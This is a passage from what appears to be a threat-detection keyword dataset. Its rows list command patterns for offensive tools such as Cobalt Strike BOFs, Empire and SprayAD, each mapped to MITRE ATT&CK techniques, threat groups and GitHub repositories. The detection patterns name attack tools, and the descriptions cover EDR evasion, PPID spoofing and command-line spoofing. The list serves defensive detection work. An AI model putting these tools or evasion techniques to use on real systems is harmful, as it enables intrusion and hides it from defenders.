T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"sleeper off","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"sleeper on","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"sniffer -*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","0","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z" +"spawn *.exe *.bin*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"SprayAD * * ","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"SprayAD.exe *","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"ss -lntp*","greyware_tool_keyword","ss","replace netstat command - service listening","T1049 - T1040","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"sudomy -*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"SwampThing.csproj","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"TokenStrip *","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" +"token-vault create*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"token-vault remove*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"token-vault set *","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"token-vault show*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"token-vault use*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"uselistener http*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"usemodule */*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"usestager *","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"wapiti -*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z"